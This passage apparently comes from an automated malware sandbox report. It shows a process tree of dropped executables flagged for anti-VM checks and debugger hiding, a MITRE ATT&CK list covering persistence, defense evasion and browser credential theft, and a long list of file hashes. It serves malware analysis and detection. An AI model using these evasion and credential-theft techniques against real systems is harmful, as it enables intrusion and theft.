C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5440
-
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2848 -ip 28481⤵PID:4196
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 636 -ip 6361⤵PID:4588
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4324
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3780
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Registry
6Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
160KB
MD5f310cf1ff562ae14449e0167a3e1fe46
SHA185c58afa9049467031c6c2b17f5c12ca73bb2788
SHA256e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855
SHA5121196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad
-
Filesize
40KB
MD5a182561a527f929489bf4b8f74f65cd7
SHA18cd6866594759711ea1836e86a5b7ca64ee8911f
SHA25642aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA5129bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558
-
Filesize
779B
MD539c8cd50176057af3728802964f92d49
SHA168fc10a10997d7ad00142fc0de393fe3500c8017
SHA256f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
SHA512cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6
-
Filesize
1KB
MD534ec6630c13fce07b99f51f698e0a0d8
SHA12898616d80ff646c0dbdf297e31f65ee45265868
SHA256f6bab8ba5d4dbae063dc40ccbf03df5dfa3863b5ccf40836db6b2d1ca4bc3794
SHA512eb063acec578ccb9b56a25c0c6834c79bf9ed4ca2fd7d4b147107983f9ade1cd3a486a12c429d7d7bc5042b986132e4aa915f3efaf1249e89460b6bcbf2f7255
-
Filesize
2KB
MD525604a2821749d30ca35877a7669dff9
SHA149c624275363c7b6768452db6868f8100aa967be
SHA2567f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
SHA512206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5
-
Filesize
987KB
MD5f49d1aaae28b92052e997480c504aa3b
SHA1a422f6403847405cee6068f3394bb151d8591fb5
SHA25681e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA51241f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
Filesize
16KB
MD5b75b85bfad2d06f1ccf71cc19dfba27e
SHA1b4af2261046804c10c10ede54fb2ce73a303cce4
SHA256d69e5a13607b1332ecc9a1ca45841370cc101cba3a02c17d127fd9775c6078e3
SHA51263960e5a4542ae5a598882f077e81ac87a624388bdf55b49995c4ceaad172b0b4cb3fdd524548f04f063e972732d0bd7939ce33df0b2c18302290bbd7470db16
-
Filesize
16KB
MD5ec0fb17cd7bda2d278fd3af69aa08681
SHA11d75c9efb572d18942b0f7ba9ff73f3075e8f80c
SHA25684e8ac44424376fda44fa15fc49b68ae8bb1346ae5fb6961ba85c72c0d00c5c1
SHA51286b4aeef07f5dc8f3095fadca8532c78ec527deb5d2b4f9debf8e9bb2dfa66a12336d5a650c704e44536421457bd04939c9912a1bc6a0fc497cd8148ebc6650c
-
Filesize
16KB
MD58586e006be6bdb10ca33901f828a7893
SHA13576ed33e2ba06447f0c7df2fe7884b778e72440
SHA2566cff4149a7e299ff68a30b0e7c062878d4c265eac57a5a1843741f0648641173
SHA512e7f759368a251047d93f81b999c5e85bbd33e8ce41207ecff6fe07df5a5a75f6559690bb6bac1e3b2c6571b2db4343971f83c281f2bfa63f68a5f86ec3f8d623
-
Filesize
16KB
MD5c4d64e33c4e1119e9f9685147ff235af
SHA121af258889f1ae59c920793bbee0252465ffd1fe
SHA25621f554c4fd474c2517e6c1bc726a6ea121e9211d155fc07274431bbbc3a9d86f
SHA512fc6f4d762aec512834fcbb5eeae8af8131b7409b8a63486b18cc43f66bcd165eec5aab8b4b46b9cf542cdfacd4090ff4bd0b3fe1099558991d4c93c69f19fc10
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\8wi25oev.default-release\activity-stream.discovery_stream.json
Filesize21KB
MD5b123bf10021f8147dbde2433cba241b1
SHA1c62d1ebd67bb9c5439e87d485b9953b8a47d7db3
SHA256bcd923205ef8acab76e7fc16206f6510ff968aaff72f84594f6a2c939f90b4c2
SHA512cee14bdc1e397a0c4129449d9ae420dce398f532a53fae5010280c23e05e9d5254823dd7daf2782158bf7a701a94de7ca31646bd834f06f81f2329e29d2c48a8
-
Filesize
1.8MB
MD51565063ca3d43812789fbf960418659e
SHA1d710ecdf1861e25498d1886f8c2a44f31826fd55
SHA256c5b7480a6d02c38a408981322c52ad0d6efbdc0a0d6508d788d3575c561cc978
SHA512eb044ea8ecdfed744685623fd3bf16dc0221900b405eff580d93de62073e31b93b23b69e81fea1a2bff6deac793cee038587d127fb3ddcca1359f3380f7cca42
-
Filesize
1.8MB
MD593da4bdbae52d91d32a34c140466e8cf
SHA12177f234160ef77058d2237a8f97c1d663647240
SHA256878228e580cd27a72a847922f9b16b7d16d0797c68aa9e6642ae3da13518de7a
SHA51214d14d6d8d436953ed43483b8b3ba30a4f1df73eb2eca055c047bb0b7e328150ae0c49122a657f5f8ab752872e5d40b791e793675110df5c90440077f446b91a
-
Filesize
779KB
MD5ff130f0907781b9b0564a2e34350bda9
SHA1968fd9f8787bda595df9a1670d28e8b129bbea99
SHA256820ab89ef3e39e2ec7f7322c4710a7fbb1cc01b5cc28043f607f30312119a1b5
SHA5128e5feb41fcfdf2366c8da4fda8d37eb29defb839689cacfdaf50d03604447e18e9cf83f31d90f7f48fce0ad40add335cf85b0c3b135de396e5971c19fd239e1f
-
Filesize
938KB
MD507164c5597a4fbd5cf8c5ebcc43fcbd3
SHA1d8ffc868f9a36ab2323440bc0a263e2e3e52def3
SHA2562ea53f7442f44cfc2ea88f2b52d6841ec009d4789f67fd002530e4dece4235d3
SHA51287d4f793aee02e5e484588913034caddfab25381a959815c57d0ec2979539c641a25cabe43c917659cc912d851c5d7d7dc64f02a01e541b554b3eedc8e0477d9
-
Filesize
1KB
MD5cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1b0db8b540841091f32a91fd8b7abcd81d9632802
SHA2565e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5
-
Filesize
506KB
MD519d2fe8a5d6c2174fb2a5c54e98523e0
SHA18e0a2cf8cbff8c169cba1e0a3785083ebeb5a627
SHA2568a12b05f92dbb47d713dbc73cccccb089fc88f6ba96b5a64f42aaf6431e5616e
SHA5123ff858f79a4e55f6728369b0f0d6de6060dbc4728ab21e5c352c209ef92b203f3039a623118706227ac61f75ab8b68ae4958d7939a000729de0890b54706ca95
-
Filesize
3.7MB
MD5aa512b143958cbbe85c4fb41bb9ba3fa
SHA146459666d53ecb974385698aa8c306e49c1110ab
SHA2568852cc3effc2d3698b05859fa1a18a758b26712263d38ea2de7ef138a31c2b26
SHA5129ab9dbf0d0f7861bf18738d59f03b20f0552461857d4ff3f68d25cc4621f85aaab94050217a1a0c6d3c5a0adb09411a21a6541dcd1042b2a95413c65b2ec0333
-
Filesize
445KB
MD5c83ea72877981be2d651f27b0b56efec
SHA18d79c3cd3d04165b5cd5c43d6f628359940709a7
SHA25613783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482
SHA512d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0
-
Filesize
4.5MB
MD584ada09d9801547265d6589b50051295
SHA1fa842424381715851e8d8d716afb27da31edd8c1
SHA256a02496bfd7675a37043304198ee5b9efb075376e4ef1509fbbd5e83e190211f6
SHA5124158f0c6409b7b11ee6023b5d295bc77ba3b82de54dd72de08c58bf2521f76ed52167b54395e35929dbb67f857205401eb262cf71c982d7e03823894f1f8037f
-
Filesize
1.8MB
MD55af71429b3b21c4ecb55d948a04f92a0
SHA16087f72c97eda7239f4e0631d07d64bfdb7c6ca0
SHA256b1c0c3f611c1ee99465613f3045b154c43e1e0f94c1171c55b8c5ff2c4a9285b
SHA512a27b3cef97bf2d58499df7ae1efafa34684f95b1b76e13c654ba9089ce3869e340e08daa12d83a1b1e2a891cd1a459d44b7a9b33e7593b9bcbb86efc9f17d827
-
Filesize
3.0MB
MD530305d29528f3aca3b09636d919bd512
SHA14af875a29e249da70f2da3519334af8fd584c193
SHA256015e79df6eee2266ce0fc395c2be08f750970312c9d0e1e6a7cff757ae63f43e
SHA512a109d05f074d3407c09e66d9bcb2f8dd19811b73b6538b4f92edee17183f22d87faea63b1a09ed831c9c297e6fa729b61d0ad0bf81629f7fb7a08d0288cb04f4
-
Filesize
1.7MB
MD5afc954940e0fc5ca6bdf390e0033a01c
SHA1aa0193bc48197c86a7ce3401be6607f0e052a319
SHA25607446af5c75f3b25664b5471d74e5e213eaf7372b14289a98a2c5e8ba01391e8
SHA512b1da9863d5427b7ca7a4a33b63bef12cb21faff28e440c053be4034759c94ffb167d9c56f188ff0d6572eebf014b8b4ad928ba7e34229603289f1c5541b80148
-
Filesize
945KB
MD508552f5efe19801cc3fafe356dccd710
SHA129d2bff1b2ecc298c1cb0a95d3af0de7ee239af9
SHA25616e6372a8712649b3c49c17f6d7103fe6f6a2c6dcf25a2d0759e43b33e2ec0b7
SHA51217457315cdd235ed76d6f607e560784154b4f5a96ccc7ea1165cb62376600bf2a745afe6f4b722e2c3fb028df9b038f636730f2ec9709d78b15d719a7aad5e7d
-
Filesize
1.7MB
MD537259000abc86b85dbb65366443ec3c1
SHA1b6cf0ac13b56918992c9c6daa38e791a40f60f88
SHA256681d6b115beeb234904a4235c87e9eecc6c25f09aab5cc20a36d58a5df35148c
SHA512866e4e4d2af9aa8657fa84c1bfa552cbedcb151dd25d3dd7871ad6c27bba599e515515f4cbbf4610477867af8fb3a8f9090c5fcd28034ebb9db42f56eb900695
-
Filesize
452KB
MD5a9749ee52eefb0fd48a66527095354bb
SHA178170bcc54e1f774528dea3118b50ffc46064fe0
SHA256b1663d4497ddd27a59f090b72adcedddac51724a1c126f7d6469f8045d065e15
SHA5129d21f0e1e376b89df717403a3939ed86ef61095bb9f0167ff15c01d3bbbee03d4dd01b3e2769ecd921e40e43bab3cbf0a6844ab6f296982227b0cb507b4b0e25
-
Filesize
105B
MD52e9d094dda5cdc3ce6519f75943a4ff4
SHA15d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7
-
Filesize
564KB
MD5a94e37aebedaf87a3763e1c7766b5940
SHA1d9064a5ec1ea7957cdde14a26e8b58ec9981fb0a
SHA2567ee9298b5c6f9e90309c31684e030960cac17d71ca1316a2493843ef35d2cd70
SHA512a82cf09a3048278b7439aedd6b2a9c5c4b528d42b5650881c88b39bc3cd4d40f995dbec2d8a2b8e1f4fc8e0e041b27f932b36fd67a4da268e5dd9f479517c948
-
Filesize
7KB
MD53811496e1794473ea967dcd32594ccbb
SHA180d98553d718103ce5d52cacd64367d71ba4edd5
SHA256477a23adf9b2e3b1b595dde107ee8f1a409671491e74b21e5ffdb0062525fc0d
SHA5129cefbd14f7a3343c164397972d177c32b7ca5f72127c34481d02068ef4c78825cf40208b8e6869535726cdf6852b55b9d89d6850bf42af50c746de494a1185c3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
717B
MD54a34ead0ee6b6933a3b8b5ee80327708
SHA18d95af383ab6125c34712d655ccce37db9985eaf
SHA2567f0e5687be8a2c1e0ceacea94cce6d423322c938434cb5a714c4293f2c9ef781
SHA512055e957a9f2581f2f426ddbfa39ba6573c0796ada5a18b8ea449d1dea4d395e0f8ed908b9e86fb81ac11739159079b30c616bd41c6c3c8e6514e8f082d193bff
-
Filesize
720B
MD5f11a581b3b827262496481540e40a4a4
SHA16da029beed230df9059d5ec3c7f1fd5cba4c3f38
SHA256eb15a3aa1e6d6e51dd6f130ca32a6ab111ec6c9b67d9106ee051ae0ebacf0a89
SHA5124f5c47dfc4d4c94e88bb8bfaa6d753280bd323b4ce9f7e9b33eb70e5764984cdf87e84c5489e0b72a7269cdb9eccadd79f0d4d1fae9a0df084a92b67dee95d45
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\8wi25oev.default-release\AlternateServices.bin
Filesize8KB
MD551b15a40eab756cf1bf6ea7702e619b9
SHA158e35962166a63953337a3da1cbc92797c2e28c4
SHA256d1d4089d4c13bbdd7b0229ea3a6338ccebcb8e72946e29b95f9e92233d5773a2
SHA512cf7e5a12b269a00bdcf2baae091defbed2a9a5ecb3fb6515d48462cd55f3bc907fa493305699caafbbd1321687166ae0b007b289ee2e370610ec2f9149c469f4
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\8wi25oev.default-release\datareporting\glean\db\data.safe.tmp
Filesize21KB
MD50a754ef89c54c049aff9d5b8864f453c
SHA191b53e2f421ee7d79f5c73854ac89f779961080a
SHA25633297eb90011f19eb7dcd1a5acfead5ce3dc1e5ec0948db9d9128f5950b41d93
SHA512fd8840fd06827d31d4629933ee681bdbad6114ceb168fae7b250c9d3874684762a10e28a3368b0dc09f589cf78300cd754d98f2a1b57eb395bf8167d39552720
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\8wi25oev.default-release\datareporting\glean\db\data.safe.tmp
Filesize22KB
MD509e18c2a364ace134e490309ea0b2889
SHA18b759dc65ef958b1053ebb201cba98007bc4c9a2
SHA2563c147a58045d230e556e96870a8259ff177128e4ab805ada0d410b6432e283ea
SHA512b9999a2a1dd85e16d5eddadce4d2e1b57a7611b0c5ab8d8fe5020f102e36ba1b62851e2f702f999be40cff63e469ea30c928e9b2fa88a81a27e316c4fbf24ace
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\8wi25oev.default-release\datareporting\glean\pending_pings\770d1bf9-923c-4b15-a2ab-4a86aae70360
Filesize982B
MD5a299b6cd256303c7ded76a09bee69c3a
SHA158572f68ab3b157d8da97435912017848cadc140
SHA256416565d1cb24ddfaa58f7dbb725ac1c1624997b0b71d9fab6854e9eaaf3cd0a9
SHA51280c3a0c5617a0fac8fd67903e4fd2f301d8691e40d024cd775852abdeb6ed40339d7effa357b20232cffbf0e3bf2944b331c2aef4717b10e9acc630d7b9f44f7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\8wi25oev.default-release\datareporting\glean\pending_pings\802b0518-2bcc-4fb1-980b-5fb39d81108a
Filesize659B
MD5d37aa6b7f5d46222b9c84042dd1ca95c
SHA16c2c887e4a82cd3fa29a7884d03e13209392ad94
SHA256031bc858b80ed885d8110dcc12435c9e90b2bd94c0c0e7dbabe391d543208a84
SHA5120d65ed3c97f066457c922796af9e82061f7f1bd2aff2af9e43c0b58eaf104861a9238ade763b0b6e7537b0eaf5b779e1d678d99938ce9f5f63c50a64b1ee6773
-
Filesize
9KB
MD54a995a2145f009974a1be8c33dcb2637
SHA1bcab03d1c1169edb1d53cb675cef6bd05ceef355
SHA256632bdb8783d3c144b3754a884acd04f96ef6cd182000c3b7c173378deaec0923
SHA512c3ae7d4e38ec1e41cfb297c4a1ff25d38b6ec0fd84e3800c5aa0a98ccc3acb20a70014d40b5d5bc974de30edda8a8fb685aa53283b70aa50315b5c86cd3a83b1
-
Filesize
2KB
MD56e1ebdfd68ea55be0e28e5a43e1faacb
SHA111b4c4e7fe5af850495c4c943e819fd1463ed147
SHA256cdbbcefbab30a14486821d6f87dd09bf70f66186c1520fd5e12e8509e5ddbc97
SHA512340eaa322321144334dbadb31f6a137b171dd2fab5c4a12d6f85988a02881f18a552dfa182819cf97002f8ded16f5f600242d1fdf5f27b41d087f2b7fe3a3afe